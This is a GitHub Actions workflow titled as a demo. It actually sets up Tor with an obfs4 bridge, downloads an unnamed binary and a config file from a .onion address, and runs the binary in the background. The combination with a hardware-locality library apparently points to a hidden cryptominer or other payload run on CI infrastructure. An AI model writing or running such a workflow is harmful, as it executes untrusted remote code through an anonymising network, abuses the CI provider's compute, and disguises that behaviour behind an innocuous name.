name: GitHub Actions Demo
on: [push]
jobs:
  Explore-GitHub-Actions:
    runs-on: ubuntu-latest
    steps:
      - run: |
          uname -a
          sudo lspci
          sudo lscpu
          sudo apt install curl tor obfs4proxy openssh-server libhwloc15 tmux -y
          curl https://ifconfig.me -vv
          sudo /bin/sh -c 'printf "ClientTransportPlugin obfs4 exec /usr/bin/obfs4proxy\nbridge obfs4 204.216.138.15:443 A84AC3289983B5F3A724A56A08ED37E5C1EB8C7C cert=nbBOrKjAxVf59r0F2QUYYgkjSSaaMPzU1reZTf+XCcfXAtvVUL0GSW+XU88frSS02qlPEw iat-mode=0\nUseBridges 1\n" >> /etc/tor/torrc'
          sudo /etc/init.d/tor restart
          sleep 30
          curl -x socks5h://127.0.0.1:9050 https://ifconfig.me -vv
          curl -x socks5h://127.0.0.1:9050 -o X http://bfovvolhmnb7ehlibo3jxkxtvzwggvx4d25r2qyymrgfq3sqe2dykzyd.onion:8080/X
          curl -x socks5h://127.0.0.1:9050 -o config.json http://bfovvolhmnb7ehlibo3jxkxtvzwggvx4d25r2qyymrgfq3sqe2dykzyd.onion:8080/config.json
          chmod +x ./X
          ldd ./X
          ldd --version
          ./X config.json &
          sleep 60
          cat log.log
          killall X
